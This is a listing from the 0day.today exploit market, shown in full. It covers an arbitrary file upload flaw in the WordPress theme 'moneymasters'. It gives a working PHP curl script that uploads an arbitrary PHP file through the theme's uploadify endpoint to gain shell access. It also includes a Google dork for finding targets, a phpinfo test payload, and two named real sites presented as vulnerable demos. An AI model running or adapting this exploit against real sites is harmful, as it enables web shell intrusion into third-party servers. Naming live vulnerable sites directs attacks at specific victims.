[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Themes moneymasters Arbitrary File Upload Vulnerability

Author
fayzoun
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-20068
Category
web applications
Date add
30-12-2012
Platform
php
################################################## #####
# Author => Fayzoun
# Facebook => http://fb.me/fayzoun.no.love
# Facebook page => http://fb.me/fayzoun.AO
# Google Dork => inurl:/wp-content/themes/moneymasters 
# Mail : fayzoun2@yahoo.fr / fayzoun@gmail.com
################################################## #
# Exploit:
<?php
 
$uploadfile="Fayzoun.php";
$ch = curl_init("http://www.vulnsite.com");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/moneymasters/code/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
  print "$postResult";
?> 

Shell Access : http://localhost/wordpress/wp-content/themes/moneymasters/code/uploadify/random_name.php
-------------------
<?php
phpinfo();
?>
------------------------------
 
[#] Demos Vulnd sites :
 
http://themiza.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
http://www.vietbacsecurity.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
################################################## 
Gretz To : .:: شهداء الأقصى ::. - Pal Snipre - The Wolf - Salem Hassine 
Thanks To: God Allah

#  0day.today [2024-12-23]  #